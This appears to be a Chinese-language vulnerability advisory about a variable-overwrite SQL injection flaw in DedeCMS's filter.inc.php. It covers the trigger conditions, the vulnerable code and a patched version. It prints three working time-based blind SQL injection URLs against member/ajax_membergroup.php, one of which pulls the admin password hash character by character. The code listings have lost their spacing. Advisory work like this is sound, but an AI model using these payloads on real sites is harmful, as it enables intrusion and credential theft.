include/filter.inc.php dedecms /include/filter.inc.php 变量覆盖注入漏洞及解决方案

1. 漏洞描述

filter.inc.php这个文件在系统配置文件之后，里面有foreach循环创建变量，所以可以覆盖系统变量

1. 在magic_quotes_gpc=off的时候可以绕过_RunMagicQuotes的过滤

2. 经过common.inc.php

3. 经过filter.inc.php//重新获得闭合攻击性

2. 漏洞触发条件

1. 程序不允许创建cfg_开头的变量，依靠这样来防御系统变量未初始化漏洞

2. common.inc.php文件的漏洞我们创建了系统变量就可以触发此类漏洞，但是有的系统变量已经初始化了，而且是在common.inc.php文件foreach循环注册变量之后，就是说我们能创建，但是没法覆盖

3. 但是filter.inc.php这个文件又进行了一次foreach循环也就是二次创建。所以如果包含了filter.inc.php文件我们就可以覆盖系统变量

4. 在/member目录的大部分文件都包含这么一个文件/member/config.php，这个文件的前两句就是require_once(dirname(__FILE__).’/../include/common.inc.php’);require_once(DEDEINC.’/filter.inc.php’);//就是说/member目录的大部分文件都受此漏洞影响可以覆盖系统变量

第一步：

http://127.0.0.1/dedecms5.5/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd' where id=@`'` or(select if(substring((select pwd from dede_admin),1,1)='f',sleep(5),0)) -- - @`'`

第二步：

http://127.0.0.1/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd' where id=@`'` or(select if(substring((select 1),1,1)='1',sleep(5),0)) -- - @`'`

第三步：

http://127.0.0.1/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd' where id=@`'` or(select if(substring((select user()),1,1)='r',sleep(5),0)) -- - @`'`

3. 漏洞代码分析

/include/filter.inc.phpfunction_FilterAll($fk,&$svar){

global$cfg_notallowstr,$cfg_replacestr;

if(is_array($svar)){

foreach($svaras$_k=>$_v){

$svar[$_k]=_FilterAll($fk,$_v);

}

}else{

if($cfg_notallowstr!=''&&eregi($cfg_notallowstr,$svar)){

ShowMsg("$fkhasnotallowwords!",'-1');

exit();

}

if($cfg_replacestr!=''){

$svar=eregi_replace($cfg_replacestr,"***",$svar);

}

}

//未对外部提交的数据进行有效转义，重新造成本地变量注入

return$svar;

}

foreach(Array('_GET','_POST','_COOKIE')as$_request){

foreach($$_requestas$_k=>$_v){

${$_k}=_FilterAll($_k,$_v);

}

}

4. 防御方法

/include/filter.inc.phpfunction_FilterAll($fk,&$svar){

global$cfg_notallowstr,$cfg_replacestr;

if(is_array($svar)){

foreach($svaras$_k=>$_v){

$svar[$_k]=_FilterAll($fk,$_v);

}

}else{

if($cfg_notallowstr!=''&&preg_match("#".$cfg_notallowstr."#i",$svar)){

ShowMsg("$fkhasnotallowwords!",'-1');

exit();

}

if($cfg_replacestr!=''){

$svar=preg_replace('/'.$cfg_replacestr.'/i',"***",$svar);

}

}

/*进行有效转义*/

returnaddslashes($svar);

}

/*对_GET,_POST,_COOKIE进行过滤*/

foreach(Array('_GET','_POST','_COOKIE')as$_request){

foreach($$_requestas$_k=>$_v){

${$_k}=_FilterAll($_k,$_v);

}

}

5.补丁下载：

如果觉得《include/filter.inc.php dedecms /include/filter.inc.php 变量覆盖注入漏洞及解决方案》对你有帮助，请点赞、收藏，并留下你的观点哦！